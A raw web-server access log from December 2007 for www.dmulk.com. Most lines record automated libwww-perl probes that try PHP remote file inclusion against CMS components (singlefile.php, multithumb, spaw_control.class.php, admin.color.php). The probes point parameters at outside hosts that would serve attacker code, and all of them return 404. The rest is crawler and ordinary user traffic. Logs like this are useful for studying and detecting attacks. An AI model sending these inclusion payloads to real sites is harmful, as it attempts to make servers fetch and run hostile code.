91.151.105.11 - - [20/Dec/2007:16:58:34 -0800] "GET /logs/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:16:58:36 -0800] "GET /logs/access_071202.log/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:16:58:36 -0800] "GET /modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:16:58:36 -0800] "GET /logs/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.73.36 - - [20/Dec/2007:16:58:44 -0800] "GET /logs/access_071207.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
91.151.105.11 - - [20/Dec/2007:16:59:16 -0800] "GET /logs/access_071203.log/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:16:59:23 -0800] "GET /logs/access_071202.log/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:16:59:24 -0800] "GET /modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:16:59:24 -0800] "GET /logs/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:16:59:42 -0800] "GET /logs/access_071203.log/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:17:00:02 -0800] "GET /logs/access_071203.log/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.133.111.29 - - [20/Dec/2007:17:00:06 -0800] "GET /logs/access_071110.log/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.111.29 - - [20/Dec/2007:17:00:06 -0800] "GET /content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.111.29 - - [20/Dec/2007:17:00:06 -0800] "GET /logs/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.228.216 - - [20/Dec/2007:17:02:12 -0800] "GET /logs/access_071110.log/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.228.216 - - [20/Dec/2007:17:02:12 -0800] "GET /content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.228.216 - - [20/Dec/2007:17:02:13 -0800] "GET /logs/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.73.36 - - [20/Dec/2007:17:03:07 -0800] "GET /logs/access_071209.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
74.6.22.159 - - [20/Dec/2007:17:03:27 -0800] "GET /tmp/?M=A HTTP/1.0" 200 1322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.151.105.11 - - [20/Dec/2007:17:04:33 -0800] "GET /logs/access_071110.log/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.151.105.11 - - [20/Dec/2007:17:04:33 -0800] "GET /content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.151.105.11 - - [20/Dec/2007:17:04:34 -0800] "GET /logs/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.29.159.130 - - [20/Dec/2007:17:04:56 -0800] "GET /logs/access_071110.log/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.29.159.130 - - [20/Dec/2007:17:04:57 -0800] "GET /content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.29.159.130 - - [20/Dec/2007:17:04:57 -0800] "GET /logs/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.73.36 - - [20/Dec/2007:17:04:58 -0800] "GET /logs/access_071205.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:17:05:35 -0800] "GET /logs/access_071110.log/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:17:05:35 -0800] "GET /content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:17:05:35 -0800] "GET /logs/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.152.41 - - [20/Dec/2007:17:06:44 -0800] "GET /logs/access_071202.log/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.152.41 - - [20/Dec/2007:17:06:44 -0800] "GET /modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.152.41 - - [20/Dec/2007:17:06:44 -0800] "GET /logs/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:17:06:50 -0800] "GET /logs/access_071110.log/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:17:06:50 -0800] "GET /content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:17:06:51 -0800] "GET /logs/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.228.216 - - [20/Dec/2007:17:07:12 -0800] "GET /logs/access_071129.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.228.216 - - [20/Dec/2007:17:07:13 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.228.216 - - [20/Dec/2007:17:07:13 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.159 - - [20/Dec/2007:17:07:42 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.0" 200 1814141 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.208.228.216 - - [20/Dec/2007:17:10:04 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.152.41 - - [20/Dec/2007:17:10:34 -0800] "GET /logs/access_071129.log/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.151.105.11 - - [20/Dec/2007:17:10:52 -0800] "GET /logs/access_071129.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.151.105.11 - - [20/Dec/2007:17:10:53 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.151.105.11 - - [20/Dec/2007:17:10:53 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.29.159.130 - - [20/Dec/2007:17:11:40 -0800] "GET /logs/access_071129.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.29.159.130 - - [20/Dec/2007:17:11:40 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.29.159.130 - - [20/Dec/2007:17:11:41 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:17:13:11 -0800] "GET /logs/access_071129.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:17:13:11 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:17:13:12 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - - [20/Dec/2007:17:13:34 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [20/Dec/2007:17:13:38 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33032 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [20/Dec/2007:17:13:38 -0800] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [20/Dec/2007:17:13:38 -0800] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [20/Dec/2007:17:13:38 -0800] "GET /warboard/images/delete.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [20/Dec/2007:17:13:38 -0800] "GET /warboard/images/update.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [20/Dec/2007:17:13:38 -0800] "GET /warboard/images/details.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [20/Dec/2007:17:13:46 -0800] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 32931 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
217.29.159.130 - - [20/Dec/2007:17:13:49 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.105.11 - - [20/Dec/2007:17:13:59 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:14:08 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
211.239.152.41 - - [20/Dec/2007:17:14:09 -0800] "GET /logs/access_071110.log/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.152.41 - - [20/Dec/2007:17:14:09 -0800] "GET /content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.152.41 - - [20/Dec/2007:17:14:09 -0800] "GET /logs/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:14:12 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
74.6.23.206 - - [20/Dec/2007:17:14:33 -0800] "GET /logs/access_071002.log HTTP/1.0" 200 70737 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.232.107.98 - - [20/Dec/2007:17:15:12 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://n-insanity.com/v/useruploads/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.132.11 - - [20/Dec/2007:17:15:47 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:15:54 -0800] "GET /imperant/ HTTP/1.0" 401 395 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:15:54 -0800] "GET /tmp/ HTTP/1.0" 200 1488 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:15:54 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:15:54 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:15:54 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:15:54 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:15:54 -0800] "GET /logs/ HTTP/1.0" 200 26519 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:15:54 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:17:16:44 -0800] "GET /logs/access_071129.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:17:16:45 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:17:16:45 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:16:46 -0800] "GET /backup2/ HTTP/1.0" 401 395 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:16:46 -0800] "GET /backup/ HTTP/1.0" 401 395 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:16:46 -0800] "GET /mobilehackers/ HTTP/1.0" 401 395 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:16:46 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:16:46 -0800] "GET /funny/ HTTP/1.0" 200 796 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:16:47 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:16:47 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:16:47 -0800] "GET /tools/ HTTP/1.0" 200 12388 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
74.6.22.159 - - [20/Dec/2007:17:17:27 -0800] "GET /megumi/?M=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:17:32 -0800] "GET /drop/ HTTP/1.0" 401 395 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.41 - - [20/Dec/2007:17:17:35 -0800] "GET /warboard/ HTTP/1.0" 401 395 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
68.8.232.250 - warboard [20/Dec/2007:17:18:21 -0800] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33032 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
72.30.179.227 - - [20/Dec/2007:17:18:31 -0800] "GET /logs/access_071031.log HTTP/1.0" 200 21492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
90.156.145.60 - - [20/Dec/2007:17:19:19 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.179.215 - - [20/Dec/2007:17:19:59 -0800] "GET /logs/access_071109.log HTTP/1.0" 200 29983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
